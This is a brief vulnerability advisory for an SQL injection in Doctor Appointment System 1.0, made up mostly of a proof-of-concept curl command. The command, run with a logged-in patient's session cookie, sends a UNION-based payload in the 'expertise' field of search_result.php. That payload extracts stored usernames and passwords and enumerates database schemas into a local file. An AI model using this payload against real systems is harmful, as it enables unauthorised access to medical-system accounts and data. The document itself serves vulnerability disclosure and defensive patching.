Doctor Appointment System 1.0 SQL Injection

Doctor Appointment System 1.0 SQL Injection

Doctor Appointment System version 1.0 suffers from a remote SQL injection vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POC:
----
1] Login as a normal patient user
2] Insert cookie after successful login in the below command:
curl -i -s -o tmp -k -X $'POST' \
-H $'Host: 192.168.1.12' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H
$'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
--data-binary
$'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'<br>\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit='
\
$'http://host/patient/search_result.php'
3] Check the tmp file for sensitive information from the database.
------------------